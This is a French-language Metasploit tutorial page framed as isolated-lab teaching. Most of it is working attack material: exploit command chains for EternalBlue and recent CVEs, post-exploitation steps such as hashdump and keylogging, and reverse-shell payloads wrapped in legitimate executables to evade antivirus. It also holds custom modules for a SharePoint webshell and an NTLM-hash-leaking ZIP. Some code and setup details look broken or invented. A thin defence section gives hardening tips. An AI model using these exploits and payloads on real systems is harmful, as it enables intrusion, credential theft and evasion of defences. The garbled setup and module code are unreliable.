⚠️ LAB ISOLÉ UNIQUEMENT – EXPLOITS RÉELS EN SIMULATION – USAGE ÉDUCATIF SEULEMENT ⚠️

🛡️ Metasploit Maestro v1 - Découverte et Exploitation de Failles en Lab

Framework offensif pour pentest éthique : scans avancés, exploits CVE, payloads custom – analyse, exécution, et défenses solides.

OFFENSIVE AVANCÉE NIVEAU MAESTRO

🎯 Introduction

Bienvenue dans Metasploit Maestro v1, forgé par Platon-Y pour Echoes of Hackers et pctamalou.fr. Ce framework Ruby est l'épée du samouraï cyber – on l'utilise pour tester les armures, pas pour attaquer les villages. Focus sur discovery, exploitation CVE (comme EternalBlue, CVE-2024-30078 WiFi RCE, CVE-2023-38646 Metabase pre-auth, et fraiche comme CVE-2025-53770 SharePoint 0-day), et payloads msfvenom. Lab isolé only, éthique stricte : on attaque pour mieux défendre. Inspiré de Vinny Troia (Hunting Cyber Criminals).

⚠️ LAB ÉDUCATIF ISOLÉ OBLIGATOIRE ⚠️
Exploits réels en simu – autorisation écrite requise.
Nous forgeons pour protéger

🛠️ Prérequis

  • Kali Linux isolé (VM ou réseau fermé)
  • Metasploit installé (msfconsole, msfvenom, msfdb) – update avec apt update && apt upgrade metasploit-framework pour modules 2025
  • Outils : nmap, arp-scan, VirtualBox/VMware pour lab
  • Cibles : Metasploitable3, Windows vulnérable (e.g., Win7 pour EternalBlue, ou SharePoint setup pour CVE-2025-53770)
  • Connaissances : Réseau, Ruby basique, CVE hunting
  • Éthique : Test en mode safe d'abord !

🔧 Setup Lab

Crée un lab isolé pour éviter les drames. Utilise VirtualBox : réseau host-only (192.168.56.0/24). Machine attaquante : Kali. Cible : Metasploitable3 ou Win vulnérable à MS17-010, ou un SharePoint test pour CVE-2025-53770 (installe via Docker pour simu rapide).

Attaquant : Kali

IP: 192.168.56.101
Commands : sudo msfdb init ; msfconsole -q

Cible : Metasploitable3 ou SharePoint

IP: 192.168.56.102
Vulns : Multiples pour tests, incluant HTTP/445

💡 Tip : Update Metasploit : apt update && apt upgrade metasploit-framework. Vérifie db : db_status. Pour SharePoint, docker pull mcr.microsoft.com/mssql/server:2022-latest et configure vuln.

🔍 Analyse & Commands

Metasploit : framework Ruby modulaire (exploits, payloads, auxiliaries). Inspiré de Vinny Troia (Chapitre 4 : Advanced NMAP), on commence par recon OSINT-like.

Deep dive : Modules en Ruby (lib/msf/core/exploit.rb). Twist : Mini-script Python pour MSF RPC.

# Interface Python avancée pour Metasploit RPC
# pctamalou.fr
# D'abord, démarrez le daemon : msfrpcd -f -S -U msf -P msfrpc -p 55552
import msfrpc
import json
class MetasploitManager:
    def __init__(self, password='msfrpc', host='127.0.0.1', port=55552):
        self.client = msfrpc.MsfRpcClient(password, host=host, port=port)
        print("[+] Connecté à Metasploit RPC")
  
    def execute_console(self, command):
        """Exécute une commande dans la console msfconsole"""
        console_id = self.client.console.create()['id']
        self.client.console.write(console_id, command)
        result = self.client.console.read(console_id)
        return result.get('data', '')
  
    def quick_exploit(self, rhost, lhost, exploit_path):
        """Lance un exploit rapidement"""
        commands = [
            f"use {exploit_path}",
            f"set RHOSTS {rhost}",
            f"set LHOST {lhost}",
            "exploit -j"
        ]
        for cmd in commands:
            self.execute_console(cmd)
        print(f"[+] Exploit lancé contre {rhost}")
# Usage
if __name__ == "__main__":
    msf = MetasploitManager()
    msf.quick_exploit("192.168.56.102", "192.168.56.101", "exploit/windows/smb/ms17_010_eternalblue")

🦠 Exploitation CVE

Scénario threat hunting : OSINT (Vinny Chap 4) -> Scan -> Exploit. EternalBlue (MS17-010) comme classique, CVE-2024-30078 (WiFi RCE), CVE-2023-38646 (Metabase pre-auth), et frais comme CVE-2025-53770 (SharePoint 0-day RCE pour du fun enterprise). Note : Pour CVE-2024-30078, module ajouté en 2025 – vérifiez avec search cve:2024-30078.

Recon : db_nmap -sS -A --script vuln 192.168.56.0/24
Exploit EternalBlue : use exploit/windows/smb/ms17_010_eternalblue ; set RHOSTS 192.168.56.102 ; set LHOST 192.168.56.101 ; exploit
CVE-2024-30078 : use exploit/windows/wifi/cve_2024_30078_rce ; set RHOSTS target ; set LHOST 192.168.56.101 ; exploit
CVE-2023-38646 : use exploit/multi/http/metabase_setup_token_rce ; set RHOSTS 192.168.56.102 ; set LHOST 192.168.56.101 ; exploit
Post-exploit : sessions -i 1 ; sysinfo ; hashdump

💣 Création Payload msfvenom

Fin en apothéose : Générez payloads custom, obfuscés pour evasion. Pour 2025, ajoutez -x pour template et -k pour keep.

# APK Android reverse TCP
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=4444 R > payload.apk
# EXE Windows obfuscé
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=4444 -f exe -x /tmp/legit.exe -k -o payload.exe
# Handler multi
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.56.101
set LPORT 4444
set ExitOnSession false
exploit -j -z
💡 Tip : Obfusquez avec -x template.exe pour evasion AV. Testez avec run -j pour background.

🛡️ Stratégies de Protection

On flippe le script : Passez Blue Team. Patch CVE (Windows Update, SharePoint hotfixes), Fail2Ban sur SSH/SMB/HTTP, iptables -A INPUT -p tcp --dport 445 -j DROP. SIEM Elastic pour détecter Metasploit signatures (e.g., rules pour CVE-2025-53770 traffic).

  • IDS Snort rules pour EternalBlue/SharePoint
  • AppArmor/SELinux enforcing sur services
  • Honeypots (Cowrie) pour trap exploits
💡 Le petit script de nettoyage:
#!/bin/bash
# Nettoyage post-Metasploit
echo "🔥 Nettoyage en cours..."
systemctl stop postgresql
rm -rf /opt/metasploit-framework/embedded/framework/data/meterpreter/*
iptables -F
echo "✅ Lab propre !"

⚡ Meterpreter Quick Commands

Meterpreter Cheatsheet
sysinfo # Info système
getuid # UID actuel
hashdump # Dump hashes
screenshot # Capture écran
migrate -N explorer.exe # Migration process
keyscan_start # Keylogger
shell # Ouvrir shell
run post/windows/gather/credentials/gpp # Gather creds

🏆 Bonus & Suggestions

Pour clore en maestro, voici un module custom Ruby pour CVE-2025-53770 (SharePoint RCE via unsafe deserialization). Copie-le dans ~/.msf4/modules/exploits/windows/sharepoint/, puis msfconsole > reload_all. Teste en lab avec un SharePoint vuln (Docker : docker run -p 80:80 sharepoint-vuln:2025). Bonus twist : un module pour CVE-2025-24071 (Win11 NTLM leak via .library-ms).

Bonus : Créez un module custom Ruby pour une CVE.

cve_2025_53770_sharepoint_rce.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Microsoft SharePoint RCE via Unsafe Deserialization (CVE-2025-53770)',
        'Description' => %q{
          This module exploits CVE-2025-53770, an unauthenticated RCE in SharePoint Server via unsafe deserialization in ToolPane.aspx.
          It bypasses auth with crafted Referer and uploads a malicious .aspx webshell for Meterpreter reverse shell.
        },
        'License' => MSF_LICENSE,
        'Author' => ['Platon-Y '], # Custom pour notre vibe
        'References' => [
          ['CVE', '2025-53770'],
          ['URL', 'https://www.microsoft.com/en-us/msrc/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770']
        ],
        'Platform' => 'win',
        'Arch' => [ARCH_X64],
        'Targets' => [['SharePoint Server 2016/2019/Subscription', {}]],
        'DefaultTarget' => 0,
        'Privileged' => true,
        'DisclosureDate' => '2025-07-20'
      )
    )
    register_options([
      Opt::RPORT(80),
      OptString.new('TARGETURI', [true, 'Base path', '/']),
      OptString.new('PAYLOAD', [false, 'Payload to execute', 'windows/meterpreter/reverse_tcp'])
    ])
  end
  def check
    res = send_request_cgi('uri' => normalize_uri(target_uri.path, '/_layouts/15/ToolPane.aspx'), 'method' => 'GET')
    return Exploit::CheckCode::Detected if res && res.code == 200 && res.body.include?('ToolPane')
    Exploit::CheckCode::Safe
  end
  def exploit
    print_status("Sending auth bypass and malicious payload...")
    payload_aspx = Rex::Text.rand_text_alpha(8) + ".aspx"
    # Générer un webshell ASPX proper (exemple avec payload encoded)
    webshell = Msf::Util::EXE.to_aspx(generate_payload_exe) # Ou craft un serialized payload pour deserialization RCE
    post_data = {
      'MSOTlPn_Uri' => "#{datastore['TARGETURI']}",
      'MSOTlPn_DWP' => webshell # Malicious deserialization payload
    }
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx'),
      'vars_post' => post_data,
      'headers' => {
        'Referer' => normalize_uri(target_uri.path, '/_layouts/SignOut.aspx'), # Auth bypass
        'Content-Type' => 'application/x-www-form-urlencoded'
      }
    })
    if res && res.code == 200
      print_good("Webshell uploaded: #{payload_aspx}")
      # Handler pour reverse shell
      handler
    else
      print_error("Exploit failed!")
    end
  end
  def handler
    # Standard Metasploit handler pour payload
    super
  end
end
💡 Usage en msfconsole : use exploit/windows/sharepoint/cve_2025_53770_sharepoint_rce ; set RHOSTS 192.168.56.102 ; set LHOST 192.168.56.101 ; exploit
cve_2025_24071_win11_ntlm_leak.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex/zip'
class MetasploitModule < Msf::Exploit::FILEFORMAT
  Rank = NormalRanking
  include Msf::Exploit::FILEFORMAT
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows 11 NTLM Hash Leak via Malicious .library-ms (CVE-2025-24071)',
        'Description' => %q{
          This module generates a malicious .library-ms file in a ZIP. When extracted and opened in Explorer on Win11,
          it triggers SMB auth to attacker, leaking NTLM hashes. Use with auxiliary/server/capture/smb for relay.
        },
        'License' => MSF_LICENSE,
        'Author' => ['Platon-Y '],
        'References' => [
          ['CVE', '2025-24071'],
          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2025-24071']
        ],
        'Platform' => 'win',
        'Arch' => [ARCH_X64],
        'Targets' => [['Windows 11', {}]],
        'DefaultTarget' => 0
      )
    )
    register_options([
      OptString.new('FILENAME', [true, 'Output file', 'exploit.zip']),
      OptString.new('ATTACKER_IP', [true, 'Your IP for SMB relay', '192.168.56.101'])
    ])
  end
  def exploit
    library_content = Rex::Text.rand_text_alpha(8) + ".library-ms"
    malicious_xml = "\\\\#{datastore['ATTACKER_IP']}\\shared\\icon.ico" # Triggers SMB to attacker
    zip = Rex::Zip::Archive.new
    zip.add_file(library_content, malicious_xml)
    file_create(zip.pack)
    print_good("Generated #{datastore['FILENAME']} – Host it, let victim extract/open, capture hashes with auxiliary/server/capture/smb")
  end
end
💡 Usage en msfconsole : use exploit/windows/fileformat/cve_2025_24071_win11_ntlm_leak ; set FILENAME exploit.zip ; set ATTACKER_IP 192.168.56.101 ; run ; (Puis : use auxiliary/server/capture/smb ; set JRUBY false ; run)

Suggestion 1 : Intégrez Cobalt Strike pour C2 avancé avec beacon sur SharePoint exploit.

Suggestion 2 : Lab challenge : Exploitez Metasploitable3 sans hints, ou setup SharePoint vuln pour CVE-2025-53770.